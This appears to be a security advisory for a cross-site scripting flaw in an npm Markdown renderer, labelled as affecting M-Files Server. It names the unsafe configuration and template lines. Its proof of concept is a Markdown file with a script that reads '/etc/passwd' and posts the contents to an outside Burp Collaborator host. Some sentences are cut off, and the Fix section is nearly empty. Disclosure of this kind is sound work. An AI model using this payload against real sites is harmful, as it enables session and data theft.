PT-2026-42586 · Npm · M-Files Server
Published
2026-05-21
·
Updated
2026-05-21
CVSS v3.1
7.2
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N |
Summary
A cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML—including
Details
An attacker can craft malicious Markdown content containing
Vulnerable Components
config.js → markdownIt: { html: true } (Lines 26–30)
The Markdown renderer is explicitly configured to allow raw HTML.
lib/markd.js (Lines 33–58)
Renders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.
lib/pages/template.html
The rendered Markdown is injected into the HTML template using <%= markdown %> without sanitization or output encoding.
PoC
Create a pwn.md
# Hello
<script>
fetch('/etc/passwd', { credentials: 'include' })
.then(r => r.text())
.then(t => fetch('https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil', { method: 'POST', body: t }));
</script>
Open it on browser.
View the HTTP request in Burp Collaborator.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to:
- Session hijacking
- Account takeover
- Credential theft
- Defacement or injection of malicious content
- Exfiltration of sensitive data via API tokens, CSRF tokens, or user information
This affects all users who can view Markdown content within the application.
Fix
XSS
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
M-Files Server